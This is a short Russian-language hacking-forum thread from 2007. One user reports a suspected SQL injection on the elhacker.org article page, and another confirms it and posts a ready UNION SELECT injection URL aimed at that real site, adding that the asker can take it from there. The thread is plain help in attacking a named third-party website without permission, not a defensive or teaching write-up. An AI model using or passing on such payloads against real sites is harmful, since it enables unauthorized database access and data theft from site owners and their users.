elhacker

Discussion in 'Уязвимости' started by Doom123, 24 Jun 2007.

  1. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    Здраствуйте.... Вот хотел найти уязвимость на какомнить хак портале ну и чтото подозрительное надыбал вроде sql иньекция(По описанию в одной статье) и мне нужна помощь

    Вот страница например

    Code:
    http://www.elhacker.org/index.php?Ver=Articulo&Id=298
    
    а вот 2ая страница

    Code:
    http://www.elhacker.org/index.php?Ver=Articulo&Id=297
    При выполнении запроса

    Code:
    http://www.elhacker.org/index.php?Ver=Articulo&Id=298-1
    Выводит страницу под номером 297

    ну вот ток я не знаю можно ли это использовать в одной статье было написано что при таком раскладе возможна есть уязвимость может ли ктото описать как её использовать если это вообще возможно...

    Зарание спасибо и прошу сильно не пинать)
     
  2. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Кто же тебя будет пинать, если ты учишься.
    Насчёт инъекции - да, ты прав.
    _http://www.elhacker.org/index.php?Ver=Articulo&Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    Дальше можешь сам. А так же почитай статьи, чтобы понять - что, да как, и чтобы полностью осознавать, что ты делаешь.
     
    2 people like this.
  3. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    спасибо тебе большое за ответ! + тебе)
     
  4. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    ЗЫ.
    Порадовала надпись снизу: Greets to Ru hackers from cucuruz :)
    нажмите ctrl-a =)